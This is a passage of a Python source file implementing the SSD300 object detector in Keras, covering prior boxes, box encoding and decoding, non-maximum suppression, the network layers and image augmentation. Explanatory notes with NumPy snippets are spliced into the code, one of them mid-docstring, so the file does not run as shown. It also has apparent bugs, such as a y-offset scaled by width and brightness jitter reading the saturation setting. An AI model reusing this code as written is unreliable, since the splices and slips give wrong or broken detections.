+ num_classes),\n num_classes without background.\n\n # Return\n assignment: Tensor with assigned boxes,\n numpy tensor of shape (num_boxes, 4 + num_classes + 8),\n priors in ground truth are fictitious,\n assignment[:, -8] has 1 if prior should be penalized\n or in other words is assigned to some ground truth box,\n assignment[:, -7:] are all 0. 
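The `iou` method above is the usual vectorized one-against-many intersection-over-union. The same computation as a free function, with a tiny check:

```python
import numpy as np

def iou_one_to_many(box, priors):
    """IoU of one [xmin, ymin, xmax, ymax] box against an (N, 4) prior array."""
    inter_ul = np.maximum(priors[:, :2], box[:2])
    inter_br = np.minimum(priors[:, 2:4], box[2:])
    inter_wh = np.clip(inter_br - inter_ul, 0, None)
    inter = inter_wh[:, 0] * inter_wh[:, 1]
    area_box = (box[2] - box[0]) * (box[3] - box[1])
    area_priors = (priors[:, 2] - priors[:, 0]) * (priors[:, 3] - priors[:, 1])
    return inter / (area_box + area_priors - inter)

priors = np.array([[0.0, 0.0, 0.5, 0.5], [0.25, 0.25, 0.75, 0.75]])
print(iou_one_to_many(np.array([0.0, 0.0, 0.5, 0.5]), priors))  # [1.    0.143]
```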
See loss for more details.\n \"\"\"\n assignment = np.zeros((self.num_priors, 4 + self.num_classes + 8))\n assignment[:, 4] = 1.0\n if len(boxes) == 0:\n return assignment\n encoded_boxes = np.apply_along_axis(self.encode_box, 1, boxes[:, :4])\n encoded_boxes = encoded_boxes.reshape(-1, self.num_priors, 5)\n best_iou = encoded_boxes[:, :, -1].max(axis=0)\n best_iou_idx = encoded_boxes[:, :, -1].argmax(axis=0)\n best_iou_mask = best_iou > 0\n best_iou_idx = best_iou_idx[best_iou_mask]\n assign_num = len(best_iou_idx)\n encoded_boxes = encoded_boxes[:, best_iou_mask, :]\n assignment[:, :4][best_iou_mask] = encoded_boxes[best_iou_idx,\n np.arange(assign_num),\n :4]\n assignment[:, 4][best_iou_mask] = 0\n assignment[:, 5:-8][best_iou_mask] = boxes[best_iou_idx, 4:]\n assignment[:, -8][best_iou_mask] = 1\n return assignment\n\n def decode_boxes(self, mbox_loc, mbox_priorbox, variances):\n \"\"\"Convert bboxes from local predictions to shifted priors.\n\n # Arguments\n mbox_loc: Numpy array of predicted locations.\n mbox_priorbox: Numpy array of prior boxes.\n variances: Numpy array of variances.\n\n # Return\n decode_bbox: Shifted priors.\n \"\"\"\n prior_width = mbox_priorbox[:, 2] - mbox_priorbox[:, 0]\n prior_height = mbox_priorbox[:, 3] - mbox_priorbox[:, 1]\n prior_center_x = 0.5 * (mbox_priorbox[:, 2] + mbox_priorbox[:, 0])\n prior_center_y = 0.5 * (mbox_priorbox[:, 3] + mbox_priorbox[:, 1])\n decode_bbox_center_x = mbox_loc[:, 0] * prior_width * variances[:, 0]\n decode_bbox_center_x += prior_center_x\n decode_bbox_center_y = mbox_loc[:, 1] * prior_width * variances[:, 1]\n decode_bbox_center_y += prior_center_y\n decode_bbox_width = np.exp(mbox_loc[:, 2] * variances[:, 2])\n decode_bbox_width *= prior_width\n decode_bbox_height = np.exp(mbox_loc[:, 3] * variances[:, 3])\n decode_bbox_height *= prior_height\n decode_bbox_xmin = decode_bbox_center_x - 0.5 * decode_bbox_width\n decode_bbox_ymin = decode_bbox_center_y - 0.5 * decode_bbox_height\n decode_bbox_xmax = decode_bbox_center_x + 0.5 * decode_bbox_width\n decode_bbox_ymax = decode_bbox_center_y + 0.5 * decode_bbox_height\n decode_bbox = np.concatenate((decode_bbox_xmin[:, None],\n decode_bbox_ymin[:, None],\n decode_bbox_xmax[:, None],\n decode_bbox_ymax[:, None]), axis=-1)\n decode_bbox = np.minimum(np.maximum(decode_bbox, 0.0), 1.0)\n return decode_bbox\n\n def detection_out(self, predictions, background_label_id=0, keep_top_k=200,\n confidence_threshold=0.01):\n \"\"\"Do non maximum suppression (nms) on prediction results.\n\n # Arguments\n predictions: Numpy array of predicted values.\n num_classes: Number of classes for prediction.\n background_label_id: Label of background class.\n keep_top_k: Number of total bboxes to be kept per image\n after nms step.\n confidence_threshold: Only consider detections,\n whose confidences are larger than a threshold.\n\n # Return\n results: List of predictions for every picture. 
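`encode_box` and `decode_boxes` are inverse center-size transforms scaled by the per-prior variances. One detail worth flagging: `decode_boxes` above scales the y-offset by `prior_width`, where the symmetric form would use `prior_height`; that looks like a slip carried over from the reference SSD port, though it is self-consistent if training used the same convention. A round-trip sketch of the transform (names are mine):

```python
import numpy as np

def encode(box_center, box_wh, prior_center, prior_wh, variances):
    """Center-size encoding used for SSD regression targets."""
    loc_xy = (box_center - prior_center) / prior_wh / variances[:2]
    loc_wh = np.log(box_wh / prior_wh) / variances[2:]
    return np.concatenate([loc_xy, loc_wh])

def decode(loc, prior_center, prior_wh, variances):
    """Inverse of encode: recover the box center and width/height."""
    center = loc[:2] * variances[:2] * prior_wh + prior_center
    wh = np.exp(loc[2:] * variances[2:]) * prior_wh
    return center, wh

variances = np.array([0.1, 0.1, 0.2, 0.2])
prior_c, prior_wh = np.array([0.5, 0.5]), np.array([0.2, 0.3])
loc = encode(np.array([0.55, 0.45]), np.array([0.25, 0.2]),
             prior_c, prior_wh, variances)
print(decode(loc, prior_c, prior_wh, variances))  # ([0.55, 0.45], [0.25, 0.2])
```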
Each prediction is:\n [label, confidence, xmin, ymin, xmax, ymax]\n \"\"\"\n mbox_loc = predictions[:, :, :4]\n variances = predictions[:, :, -4:]\n mbox_priorbox = predictions[:, :, -8:-4]\n mbox_conf = predictions[:, :, 4:-8]\n results = []\n for i in range(len(mbox_loc)):\n results.append([])\n decode_bbox = self.decode_boxes(mbox_loc[i],\n mbox_priorbox[i], variances[i])\n for c in range(self.num_classes):\n if c == background_label_id:\n continue\n c_confs = mbox_conf[i, :, c]\n c_confs_m = c_confs > confidence_threshold\n if len(c_confs[c_confs_m]) > 0:\n boxes_to_process = decode_bbox[c_confs_m]\n confs_to_process = c_confs[c_confs_m]\n feed_dict = {self.boxes: boxes_to_process,\n self.scores: confs_to_process}\n idx = self.sess.run(self.nms, feed_dict=feed_dict)\n good_boxes = boxes_to_process[idx]\n confs = confs_to_process[idx][:, None]\n labels = c * np.ones((len(idx), 1))\n c_pred = np.concatenate((labels, confs, good_boxes),\n axis=1)\n results[-1].extend(c_pred)\n if len(results[-1]) > 0:\n results[-1] = np.array(results[-1])\n argsort = np.argsort(results[-1][:, 1])[::-1]\n results[-1] = results[-1][argsort]\n results[-1] = results[-1][:keep_top_k]\n return results\n\n\nclass Normalize(Layer):\n \"\"\"Normalization layer as described in ParseNet paper.\n\n # Arguments\n scale: Default feature scale.\n\n # Input shape\n 4D tensor with shape:\n `(samples, channels, rows, cols)` if dim_ordering='th'\n or 4D tensor with shape:\n `(samples, rows, cols, channels)` if dim_ordering='tf'.\n\n # Output shape\n Same as input\n\n # References\n http://cs.unc.edu/~wliu/papers/parsenet.pdf\n\n #TODO\n Add possibility to have one scale for all features.\n \"\"\"\n def __init__(self, scale, **kwargs):\n if K.image_dim_ordering() == 'tf':\n self.axis = 3\n else:\n self.axis = 1\n self.scale = scale\n super(Normalize, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.input_spec = [InputSpec(shape=input_shape)]\n shape = (input_shape[self.axis],)\n init_gamma = self.scale * np.ones(shape)\n self.gamma = K.variable(init_gamma, name='{}_gamma'.format(self.name))\n self.trainable_weights = [self.gamma]\n\n def call(self, x, mask=None):\n output = K.l2_normalize(x, self.axis)\n output *= self.gamma\n return output\n\n\nclass PriorBox(Layer):\n \"\"\"Generate the prior boxes of designated sizes and aspect ratios.\n\n # Arguments\n img_size: Size of the input image as tuple (w, h).\n min_size: Minimum box size in pixels.\n max_size: Maximum box size in pixels.\n aspect_ratios: List of aspect ratios of boxes.\n flip: Whether to consider reverse aspect ratios.\n variances: List of variances for x, y, w, h.\n clip: Whether to clip the prior's coordinates\n such that they are within [0, 1].\n\n # Input shape\n 4D tensor with shape:\n `(samples, channels, rows, cols)` if dim_ordering='th'\n or 4D tensor with shape:\n `(samples, rows, cols, channels)` if dim_ordering='tf'.\n\n # Output shape\n 3D tensor with shape:\n (samples, num_boxes, 8)\n\n # References\n https://arxiv.org/abs/1512.02325\n\n #TODO\n Add possibility not to have variances.\n Add Theano support\n \"\"\"\n def __init__(self, img_size, min_size, max_size=None, aspect_ratios=None,\n flip=True, variances=[0.1], clip=True, **kwargs):\n if K.image_dim_ordering() == 'tf':\n self.waxis = 2\n self.haxis = 1\n else:\n self.waxis = 3\n self.haxis = 2\n self.img_size = img_size\n if min_size <= 0:\n raise Exception('min_size must be positive.')\n self.min_size = min_size\n self.max_size = max_size\n self.aspect_ratios = [1.0]\n if 
max_size:\n if max_size < min_size:\n raise Exception('max_size must be greater than min_size.')\n self.aspect_ratios.append(1.0)\n if aspect_ratios:\n for ar in aspect_ratios:\n if ar in self.aspect_ratios:\n continue\n self.aspect_ratios.append(ar)\n if flip:\n self.aspect_ratios.append(1.0 / ar)\n self.variances = np.array(variances)\n self.clip = True\n super(PriorBox, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n num_priors_ = len(self.aspect_ratios)\n layer_width = input_shape[self.waxis]\n layer_height = input_shape[self.haxis]\n num_boxes = num_priors_ * layer_width * layer_height\n return (input_shape[0], num_boxes, 8)\n\n def call(self, x, mask=None):\n if hasattr(x, '_keras_shape'):\n input_shape = x._keras_shape\n elif hasattr(K, 'int_shape'):\n input_shape = K.int_shape(x)\n layer_width = input_shape[self.waxis]\n layer_height = input_shape[self.haxis]\n img_width = self.img_size[0]\n img_height = self.img_size[1]\n # define prior boxes shapes\n box_widths = []\n box_heights = []\n for ar in self.aspect_ratios:\n if ar == 1 and len(box_widths) == 0:\n box_widths.append(self.min_size)\n box_heights.append(self.min_size)\n elif ar == 1 and len(box_widths) > 0:\n box_widths.append(np.sqrt(self.min_size * self.max_size))\n box_heights.append(np.sqrt(self.min_size * self.max_size))\n elif ar != 1:\n box_widths.append(self.min_size * np.sqrt(ar))\n box_heights.append(self.min_size / np.sqrt(ar))\n box_widths = 0.5 * np.array(box_widths)\n box_heights = 0.5 * np.array(box_heights)\n # define centers of prior boxes\n step_x = img_width / layer_width\n step_y = img_height / layer_height\n linx = np.linspace(0.5 * step_x, img_width - 0.5 * step_x,\n layer_width)\n liny = np.linspace(0.5 * step_y, img_height - 0.5 * step_y,\n layer_height)\n centers_x, centers_y = np.meshgrid(linx, liny)\n centers_x = centers_x.reshape(-1, 1)\n centers_y = centers_y.reshape(-1, 1)\n # define xmin, ymin, xmax, ymax of prior boxes\n num_priors_ = len(self.aspect_ratios)\n prior_boxes = np.concatenate((centers_x, centers_y), axis=1)\n prior_boxes = np.tile(prior_boxes, (1, 2 * num_priors_))\n prior_boxes[:, ::4] -= box_widths\n prior_boxes[:, 1::4] -= box_heights\n prior_boxes[:, 2::4] += box_widths\n prior_boxes[:, 3::4] += box_heights\n prior_boxes[:, ::2] /= img_width\n prior_boxes[:, 1::2] /= img_height\n prior_boxes = prior_boxes.reshape(-1, 4)\n if self.clip:\n prior_boxes = np.minimum(np.maximum(prior_boxes, 0.0), 1.0)\n # define variances\n num_boxes = len(prior_boxes)\n if len(self.variances) == 1:\n variances = np.ones((num_boxes, 4)) * self.variances[0]\n elif len(self.variances) == 4:\n variances = np.tile(self.variances, (num_boxes, 1))\n else:\n raise Exception('Must provide one or four variances.')\n prior_boxes = np.concatenate((prior_boxes, variances), axis=1)\n prior_boxes_tensor = K.expand_dims(K.variable(prior_boxes), 0)\n if K.backend() == 'tensorflow':\n pattern = [tf.shape(x)[0], 1, 1]\n prior_boxes_tensor = tf.tile(prior_boxes_tensor, pattern)\n elif K.backend() == 'theano':\n #TODO\n pass\n return prior_boxes_tensor\n\n\nclass SSDArchitecture(vectorial.core.Architecture):\n \"\"\"SSD300 architecture.\n\n # Arguments\n input_shape: Shape of the input image,\n expected to be either (300, 300, 3) or (3, 300, 300)(not tested).\n num_classes: Number of classes including background.\n\n # References\n https://arxiv.org/abs/1512.02325\n \"\"\"\n\n def __init__(self, num_classes=21, dropout_rate=None, input_shape=(300, 300, 3)):\n super().__init__()\n \n 
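`PriorBox.call` spaces box centers uniformly, one per feature-map cell, at the cell midpoints, then expands each center into one box per aspect ratio and normalizes by the image size. The center-grid step in isolation, with toy numbers (a 3x3 feature map on a 300x300 image, both assumed for the example):

```python
import numpy as np

layer_w = layer_h = 3
img_w = img_h = 300.0
step_x, step_y = img_w / layer_w, img_h / layer_h

# One box center per feature-map cell, placed at the cell's middle.
linx = np.linspace(0.5 * step_x, img_w - 0.5 * step_x, layer_w)
liny = np.linspace(0.5 * step_y, img_h - 0.5 * step_y, layer_h)
centers_x, centers_y = np.meshgrid(linx, liny)
print(linx)  # [ 50. 150. 250.]
```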
self.num_classes = num_classes \n net = {}\n\n # Block 1\n input_tensor = Input(shape=input_shape)\n img_size = (input_shape[1], input_shape[0])\n net['input'] = input_tensor\n net['conv1_1'] = Conv2D(64, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv1_1\")(net['input'])\n net['conv1_2'] = Conv2D(64, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv1_2\")(net['conv1_1'])\n net['pool1'] = MaxPooling2D((2, 2), padding=\"same\", strides=(2, 2), name=\"pool1\")(net['conv1_2'])\n \n # Block 2\n net['conv2_1'] = Conv2D(128, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv2_1\")(net['pool1'])\n net['conv2_2'] = Conv2D(128, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv2_2\")(net['conv2_1'])\n net['pool2'] = MaxPooling2D((2, 2), padding=\"same\", strides=(2, 2), name=\"pool2\")(net['conv2_2'])\n\n # Block 3\n net['conv3_1'] = Conv2D(256, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv3_1\")(net['pool2'])\n net['conv3_2'] = Conv2D(256, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv3_2\")(net['conv3_1'])\n net['conv3_3'] = Conv2D(256, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv3_3\")(net['conv3_2'])\n net['pool3'] = MaxPooling2D((2, 2), padding=\"same\", strides=(2, 2), name=\"pool3\")(net['conv3_3'])\n \n # Block 4\n net['conv4_1'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv4_1\")(net['pool3'])\n net['conv4_2'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv4_2\")(net['conv4_1'])\n net['conv4_3'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv4_3\")(net['conv4_2'])\n net['pool4'] = MaxPooling2D((2, 2), padding=\"same\", strides=(2, 2), name=\"pool4\")(net['conv4_3'])\n\n # Block 5\n net['conv5_1'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv5_1\")(net['pool4'])\n net['conv5_2'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv5_2\")(net['conv5_1'])\n net['conv5_3'] = Conv2D(512, (3, 3), padding=\"same\", activation=\"relu\", name=\"conv5_3\")(net['conv5_2'])\n net['pool5'] = MaxPooling2D((3, 3), padding=\"same\", strides=(1, 1), name=\"pool5\")(net['conv5_3'])\n\n if dropout_rate is not None:\n # FC6\n net['fc6'] = Conv2D(1024, (3, 3), padding=\"same\", activation=\"relu\", dilation_rate=(6, 6), name=\"fc6\")(net['pool5'])\n net['drop6'] = Dropout(dropout_rate, name='drop6')(net['fc6'])\n \n # FC7\n net['fc7'] = Conv2D(1024, (1, 1), padding=\"same\", activation=\"relu\", name=\"fc7\")(net['drop6'])\n net['drop7'] = Dropout(dropout_rate, name='drop7')(net['fc7'])\n \n # Block 6\n net['conv6_1'] = Conv2D(256, (1, 1), padding=\"same\", activation=\"relu\", name=\"conv6_1\")(net['drop7'])\n net['conv6_2'] = Conv2D(512, (3, 3), padding=\"same\", strides=(2, 2), activation=\"relu\", name=\"conv6_2\")(net['conv6_1'])\n else:\n # FC6\n net['fc6'] = Conv2D(1024, (3, 3), padding=\"same\", activation=\"relu\", dilation_rate=(6, 6), name=\"fc6\")(net['pool5'])\n \n # FC7\n net['fc7'] = Conv2D(1024, (1, 1), padding=\"same\", activation=\"relu\", name=\"fc7\")(net['fc6'])\n \n # Block 6\n net['conv6_1'] = Conv2D(256, (1, 1), padding=\"same\", activation=\"relu\", name=\"conv6_1\")(net['fc7'])\n net['conv6_2'] = Conv2D(512, (3, 3), padding=\"same\", strides=(2, 2), activation=\"relu\", name=\"conv6_2\")(net['conv6_1'])\n\n # Block 7\n net['conv7_1'] = Conv2D(128, (1, 1), padding=\"same\", activation=\"relu\", name=\"conv7_1\")(net['conv6_2'])\n net['conv7_2'] = ZeroPadding2D()(net['conv7_1'])\n 
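For a 300x300 input, each stride-2 pooling above halves the grid, `pool5` keeps the size with stride 1, and the later stride-2 convolutions shrink it further. A quick check of the spatial sizes (a sketch; only the stride-2 pools are looped over):

```python
# Spatial size through the stride-2 pools, for a 300x300 input.
size = 300
for name in ['pool1', 'pool2', 'pool3', 'pool4']:
    size = -(-size // 2)          # ceil division, matching padding="same"
    print(name, size)             # 150, 75, 38, 19
# pool5 uses stride 1, so fc7 stays 19x19; conv6_2 -> 10x10 (stride 2, same),
# conv7_2 -> 5x5 (pad 1 + valid 3x3 stride 2), conv8_2 -> 3x3 (stride 2, same).
```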
net['conv7_2'] = Conv2D(256, (3, 3), padding=\"valid\", strides=(2, 2), activation=\"relu\", name=\"conv7_2\")(net['conv7_2'])\n \n # Block 8\n net['conv8_1'] = Conv2D(128, (1, 1), padding=\"same\", activation=\"relu\", name=\"conv8_1\")(net['conv7_2'])\n net['conv8_2'] = Conv2D(256, (3, 3), padding=\"same\", strides=(2, 2), activation=\"relu\", name=\"conv8_2\")(net['conv8_1'])\n \n # Last Pool\n net['pool6'] = GlobalAveragePooling2D(name='pool6')(net['conv8_2'])\n \n # Prediction from conv4_3\n net['conv4_3_norm'] = Normalize(20, name='conv4_3_norm')(net['conv4_3'])\n num_priors = 3\n \n x = Conv2D(num_priors * 4, (3, 3), padding=\"same\", name=\"conv4_3_norm_mbox_loc\")(net['conv4_3_norm'])\n net['conv4_3_norm_mbox_loc'] = x\n flatten = Flatten(name='conv4_3_norm_mbox_loc_flat')\n net['conv4_3_norm_mbox_loc_flat'] = flatten(net['conv4_3_norm_mbox_loc'])\n name = 'conv4_3_norm_mbox_conf'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n x = Conv2D(num_priors * num_classes, (3, 3), padding=\"same\", name=name)(net['conv4_3_norm'])\n net['conv4_3_norm_mbox_conf'] = x\n flatten = Flatten(name='conv4_3_norm_mbox_conf_flat')\n net['conv4_3_norm_mbox_conf_flat'] = flatten(net['conv4_3_norm_mbox_conf'])\n priorbox = PriorBox(img_size, 30.0, aspect_ratios=[2],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='conv4_3_norm_mbox_priorbox')\n net['conv4_3_norm_mbox_priorbox'] = priorbox(net['conv4_3_norm'])\n # Prediction from fc7\n num_priors = 6\n net['fc7_mbox_loc'] = Conv2D(num_priors * 4, (3, 3), padding=\"same\", name=\"fc7_mbox_loc\")(net['fc7'])\n flatten = Flatten(name='fc7_mbox_loc_flat')\n net['fc7_mbox_loc_flat'] = flatten(net['fc7_mbox_loc'])\n name = 'fc7_mbox_conf'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n net['fc7_mbox_conf'] = Conv2D(num_priors * num_classes, (3, 3), padding=\"same\", name=name)(net['fc7'])\n flatten = Flatten(name='fc7_mbox_conf_flat')\n net['fc7_mbox_conf_flat'] = flatten(net['fc7_mbox_conf'])\n priorbox = PriorBox(img_size, 60.0, max_size=114.0, aspect_ratios=[2, 3],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='fc7_mbox_priorbox')\n net['fc7_mbox_priorbox'] = priorbox(net['fc7'])\n # Prediction from conv6_2\n num_priors = 6\n x = Conv2D(num_priors * 4, (3, 3), padding=\"same\", name=\"conv6_2_mbox_loc\")(net['conv6_2'])\n net['conv6_2_mbox_loc'] = x\n flatten = Flatten(name='conv6_2_mbox_loc_flat')\n net['conv6_2_mbox_loc_flat'] = flatten(net['conv6_2_mbox_loc'])\n name = 'conv6_2_mbox_conf'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n x = Conv2D(num_priors * num_classes, (3, 3), padding=\"same\", name=name)(net['conv6_2'])\n net['conv6_2_mbox_conf'] = x\n flatten = Flatten(name='conv6_2_mbox_conf_flat')\n net['conv6_2_mbox_conf_flat'] = flatten(net['conv6_2_mbox_conf'])\n priorbox = PriorBox(img_size, 114.0, max_size=168.0, aspect_ratios=[2, 3],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='conv6_2_mbox_priorbox')\n net['conv6_2_mbox_priorbox'] = priorbox(net['conv6_2'])\n # Prediction from conv7_2\n num_priors = 6\n x = Conv2D(num_priors * 4, (3, 3), padding=\"same\", name=\"conv7_2_mbox_loc\")(net['conv7_2'])\n net['conv7_2_mbox_loc'] = x\n flatten = Flatten(name='conv7_2_mbox_loc_flat')\n net['conv7_2_mbox_loc_flat'] = flatten(net['conv7_2_mbox_loc'])\n name = 'conv7_2_mbox_conf'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n x = Conv2D(num_priors * num_classes, (3, 3), padding=\"same\", name=name)(net['conv7_2'])\n net['conv7_2_mbox_conf'] = x\n flatten = Flatten(name='conv7_2_mbox_conf_flat')\n 
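Each source layer contributes cells x priors-per-cell boxes. Assuming the 300x300 feature-map sizes sketched earlier, the six heads wired up here and just below account for the following totals (a worked check, not from the source):

```python
# (feature-map side, priors per cell) for each prediction source layer.
sources = {'conv4_3_norm': (38, 3), 'fc7': (19, 6), 'conv6_2': (10, 6),
           'conv7_2': (5, 6), 'conv8_2': (3, 6), 'pool6': (1, 6)}
total = sum(side * side * k for side, k in sources.values())
print(total)  # 7308 priors, so mbox_loc is later reshaped to (7308, 4)
```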
net['conv7_2_mbox_conf_flat'] = flatten(net['conv7_2_mbox_conf'])\n priorbox = PriorBox(img_size, 168.0, max_size=222.0, aspect_ratios=[2, 3],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='conv7_2_mbox_priorbox')\n net['conv7_2_mbox_priorbox'] = priorbox(net['conv7_2'])\n # Prediction from conv8_2\n num_priors = 6\n x = Conv2D(num_priors * 4, (3, 3), padding=\"same\", name=\"conv8_2_mbox_loc\")(net['conv8_2'])\n net['conv8_2_mbox_loc'] = x\n flatten = Flatten(name='conv8_2_mbox_loc_flat')\n net['conv8_2_mbox_loc_flat'] = flatten(net['conv8_2_mbox_loc'])\n name = 'conv8_2_mbox_conf'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n x = Conv2D(num_priors * num_classes, (3, 3), padding=\"same\", name=name)(net['conv8_2'])\n net['conv8_2_mbox_conf'] = x\n flatten = Flatten(name='conv8_2_mbox_conf_flat')\n net['conv8_2_mbox_conf_flat'] = flatten(net['conv8_2_mbox_conf'])\n priorbox = PriorBox(img_size, 222.0, max_size=276.0, aspect_ratios=[2, 3],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='conv8_2_mbox_priorbox')\n net['conv8_2_mbox_priorbox'] = priorbox(net['conv8_2'])\n # Prediction from pool6\n num_priors = 6\n x = Dense(num_priors * 4, name='pool6_mbox_loc_flat')(net['pool6'])\n net['pool6_mbox_loc_flat'] = x\n name = 'pool6_mbox_conf_flat'\n if num_classes != 21:\n name += '_{}'.format(num_classes)\n x = Dense(num_priors * num_classes, name=name)(net['pool6'])\n net['pool6_mbox_conf_flat'] = x\n priorbox = PriorBox(img_size, 276.0, max_size=330.0, aspect_ratios=[2, 3],\n variances=[0.1, 0.1, 0.2, 0.2],\n name='pool6_mbox_priorbox')\n \n target_shape = (1, 1, 256)\n net['pool6_reshaped'] = Reshape(target_shape,\n name='pool6_reshaped')(net['pool6'])\n net['pool6_mbox_priorbox'] = priorbox(net['pool6_reshaped'])\n # Gather all predictions\n net['mbox_loc'] = concatenate([net['conv4_3_norm_mbox_loc_flat'],\n net['fc7_mbox_loc_flat'],\n net['conv6_2_mbox_loc_flat'],\n net['conv7_2_mbox_loc_flat'],\n net['conv8_2_mbox_loc_flat'],\n net['pool6_mbox_loc_flat']],\n axis=1, name='mbox_loc')\n net['mbox_conf'] = concatenate([net['conv4_3_norm_mbox_conf_flat'],\n net['fc7_mbox_conf_flat'],\n net['conv6_2_mbox_conf_flat'],\n net['conv7_2_mbox_conf_flat'],\n net['conv8_2_mbox_conf_flat'],\n net['pool6_mbox_conf_flat']],\n axis=1, name='mbox_conf')\n net['mbox_priorbox'] = concatenate([net['conv4_3_norm_mbox_priorbox'],\n net['fc7_mbox_priorbox'],\n net['conv6_2_mbox_priorbox'],\n net['conv7_2_mbox_priorbox'],\n net['conv8_2_mbox_priorbox'],\n net['pool6_mbox_priorbox']],\n axis=1, name='mbox_priorbox')\n if hasattr(net['mbox_loc'], '_keras_shape'):\n num_boxes = net['mbox_loc']._keras_shape[-1] // 4\n elif hasattr(net['mbox_loc'], 'int_shape'):\n num_boxes = K.int_shape(net['mbox_loc'])[-1] // 4\n net['mbox_loc'] = Reshape((num_boxes, 4),\n name='mbox_loc_final')(net['mbox_loc'])\n net['mbox_conf'] = Reshape((num_boxes, num_classes),\n name='mbox_conf_logits')(net['mbox_conf'])\n net['mbox_conf'] = Activation('softmax',\n name='mbox_conf_final')(net['mbox_conf'])\n net['predictions'] = concatenate([net['mbox_loc'],\n net['mbox_conf'],\n net['mbox_priorbox']],\n axis=2, name='predictions')\n\n self._model = KerasModel(net['input'], net['predictions'])\n\n loss = MultiboxLoss(self.num_classes, neg_pos_ratio=2.0).compute_loss\n metrics = []\n optimizer = SGD(lr=1e-2)\n self._defaults = {'loss': loss, 'metrics': metrics, 'optimizer': optimizer}\n self._custom_objects = {'Normalize': Normalize, 'PriorBox': PriorBox}\n\n\nclass SSDSequence(Sequence):\n def __init__(self, gt,\n batch_size, 
path_prefix,\n images, image_size,\n saturation_var=0.5,\n brightness_var=0.5,\n contrast_var=0.5,\n lighting_std=0.5,\n hflip_prob=0.5,\n vflip_prob=0.5,\n do_crop=True,\n crop_area_range=[0.75, 1.0],\n aspect_ratio_range=[3./4., 4./3.],\n train=False,\n dir_debug=None,\n num_classes=21):\n \n dir_path = os.path.dirname(os.path.realpath(__file__))\n priors = pickle.load(open(os.path.join(dir_path, 'prior_boxes_ssd300.pkl'), 'rb')) #TODO: fix\n self.bbox_util = BBoxUtility(num_classes, priors)\n self.gt = gt\n self.batch_size = batch_size\n self.path_prefix = path_prefix\n self.images = images\n self.image_size = image_size\n self.train = train\n self.color_jitter = []\n self.dir_debug = dir_debug\n if saturation_var:\n self.saturation_var = saturation_var\n self.color_jitter.append(self.saturation)\n if brightness_var:\n self.brightness_var = brightness_var\n self.color_jitter.append(self.brightness)\n if contrast_var:\n self.contrast_var = contrast_var\n self.color_jitter.append(self.contrast)\n self.lighting_std = lighting_std\n self.hflip_prob = hflip_prob\n self.vflip_prob = vflip_prob\n self.do_crop = do_crop\n self.crop_area_range = crop_area_range\n self.aspect_ratio_range = aspect_ratio_range\n \n def grayscale(self, rgb):\n return rgb.dot([0.299, 0.587, 0.114])\n\n def saturation(self, rgb):\n gs = self.grayscale(rgb)\n alpha = 2 * np.random.random() * self.saturation_var \n alpha += 1 - self.saturation_var\n rgb = rgb * alpha + (1 - alpha) * gs[:, :, None]\n return np.clip(rgb, 0, 255)\n\n def brightness(self, rgb):\n alpha = 2 * np.random.random() * self.brightness_var \n alpha += 1 - self.saturation_var\n rgb = rgb * alpha\n return np.clip(rgb, 0, 255)\n\n def contrast(self, rgb):\n gs = self.grayscale(rgb).mean() * np.ones_like(rgb)\n alpha = 2 * np.random.random() * self.contrast_var \n alpha += 1 - self.contrast_var\n rgb = rgb * alpha + (1 - alpha) * gs\n return np.clip(rgb, 0, 255)\n\n def lighting(self, img):\n cov = np.cov(img.reshape(-1, 3) / 255.0, rowvar=False)\n eigval, eigvec = np.linalg.eigh(cov)\n noise = np.random.randn(3) * self.lighting_std\n noise = eigvec.dot(eigval * noise) * 255\n img += noise\n return np.clip(img, 0, 255)\n \n def horizontal_flip(self, img, y):\n if np.random.random() < self.hflip_prob:\n img = img[:, ::-1]\n y[:, [0, 2]] = 1 - y[:, [2, 0]]\n return img, y\n \n def vertical_flip(self, img, y):\n if np.random.random() < self.vflip_prob:\n img = img[::-1]\n y[:, [1, 3]] = 1 - y[:, [3, 1]]\n return img, y\n \n def random_sized_crop(self, img, targets_y):\n img_w = img.shape[1]\n img_h = img.shape[0]\n img_area = img_w * img_h\n random_scale = np.random.random()\n random_scale *= (self.crop_area_range[1] -\n self.crop_area_range[0])\n random_scale += self.crop_area_range[0]\n target_area = random_scale * img_area\n random_ratio = np.random.random()\n random_ratio *= (self.aspect_ratio_range[1] -\n self.aspect_ratio_range[0])\n random_ratio += self.aspect_ratio_range[0]\n w = np.round(np.sqrt(target_area * random_ratio)) \n h = np.round(np.sqrt(target_area / random_ratio))\n if np.random.random() < 0.5:\n w, h = h, w\n w = min(w, img_w)\n w_rel = w / img_w\n w = int(w)\n h = min(h, img_h)\n h_rel = h / img_h\n h = int(h)\n x = np.random.random() * (img_w - w)\n x_rel = x / img_w\n x = int(x)\n y = np.random.random() * (img_h - h)\n y_rel = y / img_h\n y = int(y)\n img = img[y:y+h, x:x+w]\n new_targets = []\n for box in targets_y:\n cx = 0.5 * (box[0] + box[2])\n cy = 0.5 * (box[1] + box[3])\n if (x_rel < cx < x_rel + w_rel and\n y_rel < cy < 
